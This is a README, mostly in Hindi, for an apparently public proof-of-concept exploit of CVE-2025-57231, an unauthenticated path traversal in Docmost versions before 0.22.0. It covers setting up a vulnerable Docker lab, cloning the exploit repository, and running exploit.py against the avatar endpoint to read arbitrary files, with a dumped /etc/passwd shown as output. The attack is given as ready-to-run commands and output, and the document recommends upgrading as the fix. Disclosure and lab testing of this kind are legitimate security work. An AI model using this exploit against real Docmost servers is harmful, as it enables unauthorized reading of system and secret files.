
CVE-2025-57231 के लिए Python PoC exploit, जो Docmost < 0.22.0 में एक unauthenticated path traversal है जो avatar endpoint के माध्यम से मनमानी फ़ाइलों को पढ़ता है।
इस रेपो में CVE-2025-57231 के लिए एक Proof of Concept (PoC) एक्सप्लॉइट शामिल है।
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। इसका उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की आपको अनुमति नहीं है।
Docmost में एक डायरेक्टरी ट्रैवर्सल भेद्यता संस्करण 0.2.1 से 0.21.0 तक मनमाना फ़ाइल पठन की अनुमति देती है। एप्लिकेशन का /api/attachments/img/avatar एंडपॉइंट फ़ाइल पथों को ठीक से मान्य नहीं करता है और बिना किसी प्रमाणीकरण के सार्वजनिक रूप से सुलभ है। यह अनधिकृत हमलावरों को %2F अनुक्रमों के साथ /avatar एंडपॉइंट की जांच करके लक्ष्य से मनमाना फ़ाइल सामग्री प्राप्त करने की अनुमति देता है।
Docmost के 0.2.1 से 0.21.0 तक के सभी संस्करण प्रभावित हैं।
पूर्वापेक्षाएँ: Docker और Docker compose इंस्टॉल होना चाहिए
mkdir docmost
cd docmost
curl -O https://raw.githubusercontent.com/docmost/docmost/main/docker-compose.yml
# Generate a long random secret key
openssl rand -hex 32
# Open the docker-compose.yml file and make the following changes:
# 1. Replace `image: docmost/docmost:latest` with `image: docmost/docmost:0.21.0`
# 2. Replace `APP_SECRET` with the random secret key generated above
sudo docker-compose up -d
http://localhost:3000/ पर जाएँ और वर्कस्पेस नाम, नाम, ईमेल और पासवर्ड के लिए डमी विवरण दर्ज करें
git clone https://github.com/anirbala98/CVE-2025-57231.git
cd CVE-2025-57231/
pip install -r requirements.txt
python exploit.py <base_url> -f <file location>
python exploit.py http://localhost:3000/ -f /etc/passwd
└─$ python exploit.py http://localhost:3000/ -f /etc/passwd
[*] Attempting to read arbitrary file
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
प्लगइन को संस्करण 0.22.0 में अपग्रेड करें।